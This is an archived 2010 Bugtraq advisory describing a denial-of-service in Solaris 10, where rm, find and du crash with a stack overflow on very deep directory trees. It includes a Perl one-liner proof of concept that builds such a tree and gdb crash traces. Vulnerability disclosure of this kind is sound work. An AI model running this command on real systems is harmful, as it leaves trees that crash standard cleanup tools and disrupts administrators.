lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20100521075936.22792.qmail@securityfocus.com>
Date: 21 May 2010 07:59:36 -0000
From: cxib@...urityreason.com
To: bugtraq@...urityfocus.com
Subject: Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 17.04.2010
- - Pub.: 21.05.2010

Affected Software:
- - Sun Solaris 10 10/09

Original URL:
http://securityreason.com/achievement_securityalert/85


- --- 0.Description ---
Solaris is a Unix operating system introduced by Sun Microsystems in 1992 as the successor to SunOS.

Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle Corporation, selling computers, computer components, computer software, and information technology services. Sun was founded on February 24, 1982. The company was headquartered in Santa Clara, California (part of Silicon Valley), on the former west campus of the Agnews Developmental Center.

In computing, ZFS is a combined file system and logical volume manager designed by Sun Microsystems. The features of ZFS include support for high storage capacities, integration of the concepts of filesystem and volume management, snapshots and copy-on-write  clones, continuous integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.


- --- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service  ---
We can create, deep tree and when we will remove, scan or something else with this tree, affected program will crash with stack overflow sympton

PoC:
# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'

we need use 1..8000 or bigger value to make stack overflow.

in result

# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeedfc8a <_ndoprnt+12>:       push   %ebp

We can simple remove this dir for 1..8000

# rm -rf X
#

but let`s try create this 

# perl -e '$a="Y";for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
# rm -rf Y
Segmentation fault (core dumped)

rm(1) has fail!

what is wrong? stack overflow

# /usr/local/bin/gdb -q rm
(no debugging symbols found)
(gdb) r -rf Y
Starting program: /usr/bin/rm -rf Y
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03:      push   %ebx

# find Y CX >> /dev/null
Segmentation fault (core dumped)


find(1) also fails!

# /usr/local/bin/gdb -q find
(no debugging symbols found)
(gdb) r Y CX >> /dev/null
Starting program: /usr/bin/find Y CX >> /dev/null
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeecfc8a <_ndoprnt+12>:       push   %ebp


- --- 2. Fix ---
Sun Solaris will fix this issue.


- --- 3. Greets ---
sp3x Infospec pi3


- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkv2dbQACgkQpiCeOKaYa9aN0QCgvsk4mNEx7yXRqAX/CHOZl53x
J2YAn1OnO769x8IN2evc3VMt79QTOp+O
=2r72
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ